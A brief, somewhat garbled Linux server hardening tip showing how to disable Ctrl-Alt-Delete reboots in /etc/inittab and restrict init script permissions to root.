Comment out a line in the file to disable Control-Alt-Delete from shutting down the computer. If the server is not placed in a safe place, this is very important.
Edit the inittab file (vi /etc/inittab) and change this line:
γca::ctrlaltdel:/sbin/shutdown -t3 -r now
to:
#ca::ctrlaltdel:/sbin/shutdown -t3 -r now
Use the following command to make the changes take effect:
[root@deep]# /sbin/init q
/etc/rc.d/init.d/
/etc/rc. The script under d/init.d/ mainly contains the script program to start the service. There is no need for the average user to know the contents of the script file. So the permissions of these script files should be changed.
γγ[root@deep]# chmod -R 700 /etc/rc.d/init.d/*
This way, only root can read, write, and execute scripts in this directory.
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β